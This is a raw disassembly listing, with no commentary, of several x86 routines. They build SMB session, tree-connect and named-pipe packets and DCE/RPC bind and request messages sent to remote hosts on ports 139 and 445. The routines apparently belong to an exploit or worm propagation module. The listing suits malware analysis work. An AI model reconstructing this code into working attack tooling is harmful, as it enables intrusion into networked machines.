mov [ebp+var_C], eax
lea eax, [ebp+var_8]
push eax
push 0
lea eax, [ebp+var_10]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz loc_410F09
cmp eax, 0FFFFFFFFh
jz loc_410F09
push 0
push ebx
push esi
push [ebp+var_14]
call sub_40A338
cmp eax, 0FFFFFFFFh
jz loc_410F05
mov [ebp+var_8], 6
mov [ebp+var_4], 0
mov [ebp+var_10], 1
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
lea eax, [ebp+var_10]
push eax
push 0
call sub_40A332
cmp eax, 1
jnz loc_410F01
push [ebp+arg_10]
push 0
push [ebp+arg_C]
call sub_40F5F0
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+var_14]
call sub_40A32C
cmp eax, 0FFFFFFFFh
jz short loc_410EFD
or eax, eax
jz short loc_410EFD
mov esi, eax
mov edi, [ebp+arg_C]
cmp dword ptr [edi+4], 424D53FFh
jnz short loc_410EEF
mov ebx, [edi]
push ebx
call sub_40A30E
mov ebx, eax
add ebx, 4
mov [ebp+var_18], ebx
sub ebx, esi
add edi, esi
jmp short loc_410EE9
; ---------------------------------------------------------------------------
loc_410EB1: ; CODE XREF: sub_410DC0+12B�j
mov [ebp+var_8], 6
mov [ebp+var_4], 0
mov [ebp+var_10], 1
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
push 0
push ebx
push edi
push [ebp+var_14]
call sub_40A32C
mov esi, eax
cmp eax, 0FFFFFFFFh
jz short loc_410EE3
or eax, eax
jnz short loc_410EE5
loc_410EE3: ; CODE XREF: sub_410DC0+11D�j
jmp short loc_410F0B
; ---------------------------------------------------------------------------
loc_410EE5: ; CODE XREF: sub_410DC0+121�j
add edi, eax
sub ebx, eax
loc_410EE9: ; CODE XREF: sub_410DC0+EF�j
or ebx, ebx
jnz short loc_410EB1
jmp short loc_410F0B
; ---------------------------------------------------------------------------
loc_410EEF: ; CODE XREF: sub_410DC0+D9�j
push 45724474h
call sub_414414
jmp short loc_410F0B
; ---------------------------------------------------------------------------
db 0EBh
db 0Eh
; ---------------------------------------------------------------------------
loc_410EFD: ; CODE XREF: sub_410DC0+C7�j
; sub_410DC0+CB�j
jmp short loc_410F15
; ---------------------------------------------------------------------------
db 0EBh
db 0Ah
; ---------------------------------------------------------------------------
loc_410F01: ; CODE XREF: sub_410DC0+A1�j
jmp short loc_410F15
; ---------------------------------------------------------------------------
db 0EBh
db 6
; ---------------------------------------------------------------------------
loc_410F05: ; CODE XREF: sub_410DC0+6A�j
jmp short loc_410F15
; ---------------------------------------------------------------------------
db 0EBh
db 2
; ---------------------------------------------------------------------------
loc_410F09: ; CODE XREF: sub_410DC0+4C�j
; sub_410DC0+55�j
jmp short loc_410F15
; ---------------------------------------------------------------------------
loc_410F0B: ; CODE XREF: sub_410DC0:loc_410EE3�j
; sub_410DC0+12D�j ...
mov eax, [ebp+var_18]
pop ebx
pop esi
pop edi
leave
retn 14h
; ---------------------------------------------------------------------------
loc_410F15: ; CODE XREF: sub_410DC0:loc_410EFD�j
; sub_410DC0:loc_410F01�j ...
call sub_40A2F0
push eax
call sub_414414
jmp short loc_410F0B
sub_410DC0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F30 proc near ; CODE XREF: sub_407B46+8E�p
; sub_408440:loc_4085FC�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
mov [ebp+var_C], 0FFFFFFFFh
or edi, edi
jz loc_41106D
push 0
call sub_41274B
or eax, eax
jz loc_41106D
mov [ebp+var_C], eax
mov ebx, eax
push 31Ah
push edi
push ebx
call sub_40F5BF
mov dword ptr [ebx], 53484152h
mov [ebx+4], edi
push [ebp+arg_4]
call sub_40A266
inc eax
mov [ebp+var_8], eax
mov eax, [ebx+0Ch]
or eax, eax
jz loc_41106D
mov esi, eax
push 8Fh
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 75h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
add esi, 20h
mov byte ptr [esi], 4
mov byte ptr [esi+1], 0FFh
mov byte ptr [esi+2], 0
mov word ptr [esi+3], 0
mov word ptr [esi+5], 0
mov word ptr [esi+7], 1
mov eax, 1
add eax, 6
add eax, [ebp+var_8]
mov [esi+9], ax
add esi, 0Bh
add esi, 1
push [ebp+var_8]
push [ebp+arg_4]
push esi
call sub_40F5BF
add esi, [ebp+var_8]
push 6
push offset dword_41A944
push esi
call sub_40F5BF
add esi, 6
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 2000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
cmp eax, 0FFFFFFFFh
jz short loc_41105E
add edi, 4
mov ecx, [edi+5]
or ecx, ecx
jnz short loc_411047
movzx ecx, word ptr [edi+18h]
mov [ebx+56h], ecx
jmp short loc_41106D
; ---------------------------------------------------------------------------
loc_411047: ; CODE XREF: sub_410F30+10C�j
push ecx
call sub_414414
push [ebp+var_C]
call sub_412700
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_41106D
; ---------------------------------------------------------------------------
loc_41105E: ; CODE XREF: sub_410F30+102�j
push [ebp+var_C]
call sub_412700
mov [ebp+var_C], 0FFFFFFFFh
loc_41106D: ; CODE XREF: sub_410F30+15�j
; sub_410F30+24�j ...
mov eax, [ebp+var_C]
pop ebx
pop esi
pop edi
leave
retn 8
sub_410F30 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411080 proc near ; CODE XREF: sub_407B46+AD�p
; sub_408440+1E5�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
mov [ebp+var_C], 0FFFFFFFFh
or edi, edi
jz loc_4111CB
push 0
call sub_41274B
or eax, eax
jz loc_4111CB
mov [ebp+var_C], eax
mov ebx, eax
push 31Ah
push edi
push ebx
call sub_40F5BF
mov dword ptr [ebx], 50495045h
mov [ebx+4], edi
push [ebp+arg_4]
call sub_40A266
inc eax
mov [ebp+var_8], eax
mov eax, [ebx+0Ch]
or eax, eax
jz loc_4111CB
mov esi, eax
push 0B7h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 0A2h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov eax, [ebx+56h]
mov [esi+18h], ax
add esi, 20h
mov byte ptr [esi], 18h
mov byte ptr [esi+1], 0FFh
mov eax, [ebp+var_8]
dec eax
mov [esi+6], ax
mov dword ptr [esi+8], 16h
mov dword ptr [esi+10h], 2019Fh
mov dword ptr [esi+20h], 7
mov dword ptr [esi+24h], 1
mov dword ptr [esi+28h], 40h
mov dword ptr [esi+2Ch], 2
mov eax, [ebp+var_8]
mov [esi+31h], ax
add esi, 33h
push [ebp+var_8]
push [ebp+arg_4]
push esi
call sub_40F5BF
add esi, [ebp+var_8]
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
cmp eax, 0FFFFFFFFh
jz short loc_4111BC
add edi, 4
mov ecx, [edi+5]
or ecx, ecx
jnz short loc_4111A5
add edi, 20h
movzx ecx, word ptr [edi+6]
mov [ebx+186h], ecx
jmp short loc_4111CB
; ---------------------------------------------------------------------------
loc_4111A5: ; CODE XREF: sub_411080+114�j
push ecx
call sub_414414
push [ebp+var_C]
call sub_412700
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_4111CB
; ---------------------------------------------------------------------------
loc_4111BC: ; CODE XREF: sub_411080+10A�j
push [ebp+var_C]
call sub_412700
mov [ebp+var_C], 0FFFFFFFFh
loc_4111CB: ; CODE XREF: sub_411080+15�j
; sub_411080+24�j ...
mov eax, [ebp+var_C]
pop ebx
pop esi
pop edi
leave
retn 8
sub_411080 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
dd 0
dd 24648Dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111E0 proc near ; CODE XREF: sub_407B46+CC�p
; sub_408440:loc_408656�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz loc_41132D
mov esi, eax
push 0C5h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 25h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
push esi
push ebx
call sub_412804
mov eax, [ebx+56h]
mov [esi+18h], ax
add esi, 20h
mov byte ptr [esi], 10h
mov eax, 1Eh
add eax, 2Ah
mov [esi+3], ax
mov word ptr [esi+5], 400h
mov word ptr [esi+7], 0FFE0h
mov eax, 43h
add eax, 7
mov [esi+15h], ax
mov eax, 1Eh
add eax, 2Ah
mov [esi+17h], ax
mov eax, 43h
add eax, 7
mov [esi+19h], ax
mov byte ptr [esi+1Bh], 2
mov word ptr [esi+1Dh], 26h
mov eax, [ebx+186h]
mov [esi+1Fh], ax
mov eax, 1Eh
add eax, 7
add eax, 2Ah
mov [esi+21h], ax
add esi, 23h
push 7
push offset loc_41A95C
push esi
call sub_40F5BF
add esi, 7
mov byte ptr [esi], 5
mov byte ptr [esi+2], 0Bh
mov byte ptr [esi+3], 3
mov dword ptr [esi+4], 10h
mov eax, 1Eh
add eax, 2Ah
mov [esi+8], ax
mov word ptr [esi+10h], 16D0h
mov word ptr [esi+12h], 16D0h
mov dword ptr [esi+18h], 1
add esi, 1Eh
mov word ptr [esi], 1 ; CODE XREF: .text:00401EDA�j
add esi, 2
push 14h
push [ebp+arg_4]
push esi
call sub_40F5BF
add esi, 14h
push 14h
push offset byte_41A963
push esi
call sub_40F5BF
add esi, 14h
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
mov esi, eax
cmp eax, 0FFFFFFFFh
jz short loc_41132D
add edi, 4
mov esi, [edi+5]
loc_41132D: ; CODE XREF: sub_4111E0+11�j
; sub_4111E0+145�j
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 8
sub_4111E0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411340 proc near ; CODE XREF: sub_408440:loc_4086F5�p
; sub_412840+5C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push edi
push esi
push ebx
mov [ebp+var_10], 0FFFFFFFFh
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz loc_4114CA
mov esi, eax
push 0BFh
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 25h
mov byte ptr [esi+9], 18h
mov word ptr [esi+0Ah], 2001h
mov eax, [ebx+56h]
mov [esi+18h], ax
push esi
push ebx
call sub_412804
add esi, 20h
mov byte ptr [esi], 10h
mov eax, 18h
add eax, [ebp+arg_10]
mov [esi+3], ax
mov word ptr [esi+5], 400h
mov word ptr [esi+7], 0FFE0h
mov eax, 43h
add eax, 7
mov [esi+15h], ax
mov eax, 18h
add eax, [ebp+arg_10]
mov [esi+17h], ax
mov eax, 43h
add eax, 7
mov [esi+19h], ax
mov byte ptr [esi+1Bh], 2
mov word ptr [esi+1Dh], 26h
mov eax, [ebx+186h]
mov [esi+1Fh], ax
mov eax, 18h
add eax, 7
add eax, [ebp+arg_10]
mov [esi+21h], ax
add esi, 23h
push 7
push offset loc_41A95C
push esi
call sub_40F5BF
add esi, 7
mov byte ptr [esi], 5
mov eax, [ebp+arg_8]
mov [esi+3], al
mov dword ptr [esi+4], 10h
mov eax, [ebp+arg_10]
add eax, 18h
mov [esi+8], ax
mov eax, [ebp+arg_10]
mov [esi+10h], eax
mov eax, [ebp+arg_4]
mov [esi+16h], ax
add esi, 18h
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call sub_40F5BF
add esi, [ebp+arg_10]
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 2000h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
mov esi, eax
cmp eax, 0FFFFFFFFh
jz short loc_4114CA
add edi, 4
mov esi, edi
mov eax, [edi+5]
mov [ebp+var_10], eax
add edi, 20h
cmp [ebp+var_10], 0
jnz short loc_4114CA
mov esi, edi
add esi, 17h
add esi, 3
and esi, 0FFFFFFFCh
xor eax, eax
cmp byte ptr [esi], 5
jnz short loc_4114A2
cmp byte ptr [esi+3], 3
jnz short loc_4114A2
cmp byte ptr [esi+2], 2
jnz short loc_4114A2
mov eax, [esi+10h]
loc_4114A2: ; CODE XREF: sub_411340+151�j
; sub_411340+157�j ...
mov [ebp+var_C], eax
cmp [ebp+arg_18], 0
jz short loc_4114CA
cmp [ebp+arg_14], 0
jz short loc_4114CA
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_18]
mov [ecx], eax
add edi, 17h
add edi, 17h
add edi, 3
and edi, 0FFFFFFFCh
mov ecx, [ebp+arg_14]
mov [ecx], edi
loc_4114CA: ; CODE XREF: sub_411340+18�j
; sub_411340+12B�j ...
mov eax, [ebp+var_10]
pop ebx
pop esi
pop edi
leave
retn 1Ch
sub_411340 endp
; ---------------------------------------------------------------------------
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114E0 proc near ; CODE XREF: sub_4095A0+22�p
; sub_411800+19�p
var_430 = word ptr -430h
var_42E = word ptr -42Eh
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFBC8h
push edi
push esi
push ebx
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+arg_0]
call sub_40A31A
mov esi, eax
push 6
push 1
push 2
call sub_40A34A
cmp eax, 0FFFFFFFFh
jz loc_4117EF
mov [ebp+var_42C], eax
mov [ebp+var_14], 2
push 8Bh
call sub_40A314
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_418], 1
lea eax, [ebp+var_418]
push eax
push 8004667Eh
push [ebp+var_42C]
call sub_40A326
mov [ebp+var_430], 1
mov [ebp+var_42E], 0
push 4
lea eax, [ebp+var_430]
push eax
push 80h
push 0FFFFh
push [ebp+var_42C]
call sub_40A33E
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_42C]
call sub_40A302
cmp eax, 0FFFFFFFFh
jnz loc_4117E6
call sub_40A2F0
cmp eax, 2733h
jnz loc_4116BA
mov [ebp+var_420], 6
mov [ebp+var_41C], 0
mov [ebp+var_428], 1
mov eax, [ebp+var_42C]
mov [ebp+var_424], eax
lea eax, [ebp+var_420]
push eax
push 0
lea eax, [ebp+var_428]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz loc_4116B3
cmp eax, 0FFFFFFFFh
jz loc_4116B3
loc_4115FD: ; CODE XREF: sub_4114E0+30A�j
push 0
push 4Ch
push offset dword_41A830
push [ebp+var_42C]
call sub_40A338
cmp eax, 0FFFFFFFFh
jnz short loc_41161B
jmp loc_4116BA
; ---------------------------------------------------------------------------
loc_41161B: ; CODE XREF: sub_4114E0+134�j
mov [ebp+var_420], 6
mov [ebp+var_41C], 0
mov [ebp+var_428], 1
mov eax, [ebp+var_42C]
mov [ebp+var_424], eax
lea eax, [ebp+var_420]
push eax
push 0
push 0
lea eax, [ebp+var_428]
push eax
push 0
call sub_40A332
or eax, eax
jz short loc_4116AC
cmp eax, 0FFFFFFFFh
jz short loc_4116AC
push 0
push 400h
lea eax, [ebp+var_414]
push eax
push [ebp+var_42C]
call sub_40A32C
cmp eax, 0FFFFFFFFh
jnz short loc_411687
jmp short loc_4116BA
; ---------------------------------------------------------------------------
loc_411687: ; CODE XREF: sub_4114E0+1A3�j
lea ecx, [ebp+var_414]
cmp byte ptr [ecx], 82h
jnz short loc_411697
cmp eax, 7
jbe short loc_411699
loc_411697: ; CODE XREF: sub_4114E0+1B0�j
jmp short loc_4116BA
; ---------------------------------------------------------------------------
loc_411699: ; CODE XREF: sub_4114E0+1B5�j
push [ebp+var_42C]
pop [ebp+var_4]
jmp loc_4117EF
; ---------------------------------------------------------------------------
db 0E9h
dd 143h
; ---------------------------------------------------------------------------
loc_4116AC: ; CODE XREF: sub_4114E0+180�j
; sub_4114E0+185�j
jmp short loc_4116BA
; ---------------------------------------------------------------------------
dw 3CE9h
db 1, 2 dup(0)
; ---------------------------------------------------------------------------
loc_4116B3: ; CODE XREF: sub_4114E0+10E�j
; sub_4114E0+117�j
jmp short loc_4116BA
; ---------------------------------------------------------------------------
db 0E9h, 35h, 1
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4116BA: ; CODE XREF: sub_4114E0+C3�j
; sub_4114E0+136�j ...
push [ebp+var_42C]
call sub_40A2FC
push 6
push 1
push 2
call sub_40A34A
cmp eax, 0FFFFFFFFh
jz loc_4117E4
mov [ebp+var_42C], eax
push 1BDh
call sub_40A314
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_418], 1
lea eax, [ebp+var_418]
push eax
push 8004667Eh
push [ebp+var_42C]
call sub_40A326
mov [ebp+var_430], 1
mov [ebp+var_42E], 0
push 4
lea eax, [ebp+var_430]
push eax
push 80h
push 0FFFFh
push [ebp+var_42C]
call sub_40A33E
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_42C]
call sub_40A302
cmp eax, 0FFFFFFFFh
jnz loc_4117DE
call sub_40A2F0
cmp eax, 2733h
jnz short loc_4117C4
mov [ebp+var_420], 6
mov [ebp+var_41C], 0
mov [ebp+var_428], 1
mov eax, [ebp+var_42C]
mov [ebp+var_424], eax
lea eax, [ebp+var_420]
push eax
push 0
lea eax, [ebp+var_428]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz short loc_4117C0
cmp eax, 0FFFFFFFFh
jz short loc_4117C0
loc_4117B3: ; CODE XREF: sub_4114E0+302�j
push [ebp+var_42C]
pop [ebp+var_4]
jmp short loc_4117EF
; ---------------------------------------------------------------------------
dw 24EBh
; ---------------------------------------------------------------------------
loc_4117C0: ; CODE XREF: sub_4114E0+2CC�j
; sub_4114E0+2D1�j
jmp short loc_4117C4
; ---------------------------------------------------------------------------
dw 20EBh
; ---------------------------------------------------------------------------
loc_4117C4: ; CODE XREF: sub_4114E0+285�j
; sub_4114E0:loc_4117C0�j
push 2
push [ebp+var_42C]
call sub_40A344
push [ebp+var_42C]
call sub_40A2FC
jmp short loc_4117E4
; ---------------------------------------------------------------------------
loc_4117DE: ; CODE XREF: sub_4114E0+275�j
or eax, eax
jnz short loc_4117E4
jmp short loc_4117B3
; ---------------------------------------------------------------------------
loc_4117E4: ; CODE XREF: sub_4114E0+1F3�j
; sub_4114E0+2FC�j ...
jmp short loc_4117EF
; ---------------------------------------------------------------------------
loc_4117E6: ; CODE XREF: sub_4114E0+B3�j
or eax, eax
jnz short loc_4117EF
jmp loc_4115FD
; ---------------------------------------------------------------------------
loc_4117EF: ; CODE XREF: sub_4114E0+2B�j
; sub_4114E0+1C2�j ...
mov eax, [ebp+var_4]
pop ebx
pop esi
pop edi
leave
retn 8
sub_4114E0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411800 proc near ; CODE XREF: sub_407B46+3E�p
; sub_407B46+65�p ...
var_E8 = byte ptr -0E8h
var_78 = byte ptr -78h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFF18h
push edi
push esi
push ebx
mov [ebp+var_8], 0FFFFFFFFh
push [ebp+arg_C]
push [ebp+arg_0]
call sub_4114E0
cmp eax, 0FFFFFFFFh
jz loc_41196C
mov edi, eax
push 0
call sub_41274B
mov [ebp+var_4], eax
or eax, eax
jz loc_411964
mov ebx, eax
mov dword ptr [ebx], 53455353h
mov [ebx+4], ebx
call sub_40A16A
mov [ebx+1Ch], eax
mov [ebx+8], edi
push 4
push 3000h
push 2000h
push 0
call sub_40A22A
or eax, eax
jz loc_41191C
mov [ebx+0Ch], eax
lea eax, [eax+1100h]
mov [ebx+10h], eax
mov eax, 0F00h
mov [ebx+14h], eax
push 60h
push 0
lea eax, [ebp+var_78]
push eax
call sub_40F5F0
lea eax, [ebp+var_78]
push eax
push dword_41A8A4
push offset byte_41A8A8
push [ebp+var_4]
call sub_4128B0
cmp eax, 0FFFFFFFFh
jz short loc_411921
cmp [ebp+arg_4], 0
jz short loc_411900
cmp [ebp+arg_8], 0
jz short loc_411900
push 60h
push 0
lea eax, [ebp+var_E8]
push eax
call sub_40F5F0
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_78]
push eax
push [ebp+arg_8]
call sub_412990
push [ebp+arg_4]
call sub_414408
push [ebp+arg_4]
call sub_40A266
inc eax
push eax
push [ebp+arg_4]
push 30h
lea eax, [ebp+var_E8]
push eax
push [ebp+var_4]
call sub_411980
jmp short loc_411910
; ---------------------------------------------------------------------------
loc_411900: ; CODE XREF: sub_411800+AD�j
; sub_411800+B3�j
push 0
push 0
push 0
push 0
push [ebp+var_4]
call sub_411980
loc_411910: ; CODE XREF: sub_411800+FE�j
or eax, eax
jnz short loc_41191A
push [ebp+var_4]
pop [ebp+var_8]
loc_41191A: ; CODE XREF: sub_411800+112�j
jmp short loc_411921
; ---------------------------------------------------------------------------
loc_41191C: ; CODE XREF: sub_411800+66�j
call sub_40A17C
loc_411921: ; CODE XREF: sub_411800+A7�j
; sub_411800:loc_41191A�j
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_411973
mov ebx, [ebp+var_4]
or ebx, ebx
jz short loc_411962
cmp dword ptr [ebx+8], 0
jz short loc_41195A
push dword ptr [ebx+8]
call sub_40A2FC
cmp dword ptr [ebx+0Ch], 0
jz short loc_41195A
push 8000h
push 0
push dword ptr [ebx+0Ch]
call sub_40A230
or eax, eax
jnz short loc_41195A
call sub_40A17C
loc_41195A: ; CODE XREF: sub_411800+132�j
; sub_411800+140�j ...
push [ebp+var_4]
call sub_412700
loc_411962: ; CODE XREF: sub_411800+12C�j
jmp short loc_411973
; ---------------------------------------------------------------------------
loc_411964: ; CODE XREF: sub_411800+35�j
push edi
call sub_40A2FC
jmp short loc_411973
; ---------------------------------------------------------------------------
loc_41196C: ; CODE XREF: sub_411800+21�j
mov [ebp+var_8], 0FFFFFFFBh
loc_411973: ; CODE XREF: sub_411800+125�j
; sub_411800:loc_411962�j ...
mov eax, [ebp+var_8]
pop ebx
pop esi
pop edi
leave
retn 10h
sub_411800 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411980 proc near ; CODE XREF: sub_411800+F9�p
; sub_411800+10B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov [ebp+var_8], 0FFFFFFFFh
mov ebx, [ebp+arg_0]
mov eax, [ebx+0Ch]
or eax, eax
jz loc_411B03
mov esi, eax
push 105h
push 0
push esi
call sub_40F5F0
mov [ebp+var_4], esi
add esi, 4
mov dword ptr [esi], 424D53FFh
mov byte ptr [esi+4], 73h
mov byte ptr [esi+9], 8
mov word ptr [esi+0Ah], 4001h
push esi
push ebx
call sub_412804
add esi, 20h
mov byte ptr [esi], 0Dh
mov byte ptr [esi+1], 0FFh
mov word ptr [esi+5], 4400h
mov word ptr [esi+7], 2
mov word ptr [esi+9], 9FCh
mov dword ptr [esi+17h], 0F0h
xor eax, eax
cmp [ebp+arg_8], eax
jz short loc_411A07
cmp [ebp+arg_10], eax
jz short loc_411A07
cmp [ebp+arg_4], eax
jz short loc_411A07
cmp [ebp+arg_C], eax
jnz short loc_411A0F
loc_411A07: ; CODE XREF: sub_411980+76�j
; sub_411980+7B�j ...
mov word ptr [esi+1Bh], 25h
jmp short loc_411A2A
; ---------------------------------------------------------------------------
loc_411A0F: ; CODE XREF: sub_411980+85�j
mov word ptr [esi+0Fh], 18h
mov word ptr [esi+11h], 18h
mov eax, 30h
add eax, [ebp+arg_10]
add eax, 25h
mov [esi+1Bh], ax
loc_411A2A: ; CODE XREF: sub_411980+8D�j
add esi, 1Dh
xor eax, eax
cmp [ebp+arg_8], eax
jz short loc_411A43
cmp [ebp+arg_10], eax
jz short loc_411A43
cmp [ebp+arg_4], eax
jz short loc_411A43
cmp [ebp+arg_C], eax
jnz short loc_411A4A
loc_411A43: ; CODE XREF: sub_411980+B2�j
; sub_411980+B7�j ...
mov [esi], eax
add esi, 2
jmp short loc_411A6F
; ---------------------------------------------------------------------------
loc_411A4A: ; CODE XREF: sub_411980+C1�j
push 30h
push [ebp+arg_4]
push esi
call sub_40F5BF
add esi, 30h
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call sub_40F5BF
add esi, [ebp+arg_10]
mov word ptr [esi], 20h
add esi, 2
loc_411A6F: ; CODE XREF: sub_411980+C8�j
push 23h
push offset dword_41A880
push esi
call sub_40F5BF
add esi, 23h
mov edi, [ebp+var_4]
sub esi, edi
lea eax, [esi-4]
push eax
call sub_40A30E
mov [edi], eax
push 1F4h
push edi
push esi
push edi
push dword ptr [ebx+8]
call sub_410DC0
cmp eax, 0FFFFFFFFh
jz short loc_411B03
mov ecx, [edi]
push ecx
call sub_40A30E
cmp eax, 2Dh
jbe short loc_411B03
add edi, 4
mov esi, [edi+5]
mov [ebp+var_8], esi
movzx ecx, word ptr [edi+1Ch]
mov [ebx+18h], ecx
add edi, 20h
movzx ecx, byte ptr [edi+1]
cmp cl, 0FFh
jnz short loc_411B03
movzx ecx, byte ptr [edi]
shl ecx, 1
add edi, ecx
add edi, 3
push edi
lea eax, [ebx+18Ah]
push eax
call sub_40A25A
push edi
call sub_40A266
inc eax
add edi, eax
push edi
call sub_40A266
inc eax
add edi, eax
push edi
lea eax, [ebx+252h]
push eax
call sub_40A25A
loc_411B03: ; CODE XREF: sub_411980+18�j
; sub_411980+122�j ...
mov eax, [ebp+var_8]
pop ebx
pop esi
pop edi
leave
retn 14h
sub_411980 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411B10 proc near ; CODE XREF: sub_408AD0+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
mov eax, [ebx+10h]
mov [ebp+var_4], eax
mov edi, eax
push 258h
push 0
push edi
call sub_40F5F0
mov ecx, [ebp+arg_10]
mov [ecx], edi
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
push [ebp+arg_4]
push edi
call sub_411BD0
add edi, eax
mov dword ptr [edi], 2
add edi, 4
mov dword ptr [edi], 2
mov dword ptr [edi+4], 0FFFFFFFFh
add edi, 8
mov dword ptr [edi], 0FFFFFFFFh
mov dword ptr [edi+4], 0
mov dword ptr [edi+8], 0
mov dword ptr [edi+0Ch], 0
mov dword ptr [edi+10h], 0FFFFFFFFh
mov dword ptr [edi+14h], 0
mov dword ptr [edi+18h], 0FFFFFFFFh
mov dword ptr [edi+1Ch], 0
add edi, 20h
push [ebp+arg_8]
push edi
call sub_411BD0
add edi, eax
push [ebp+arg_C]
push edi
call sub_411BD0
add edi, eax
mov esi, [ebp+var_4]
sub edi, esi
mov ecx, [ebp+arg_14]
add edi, 4
mov [ecx], edi
pop ebx
pop esi
pop edi
leave
retn 18h
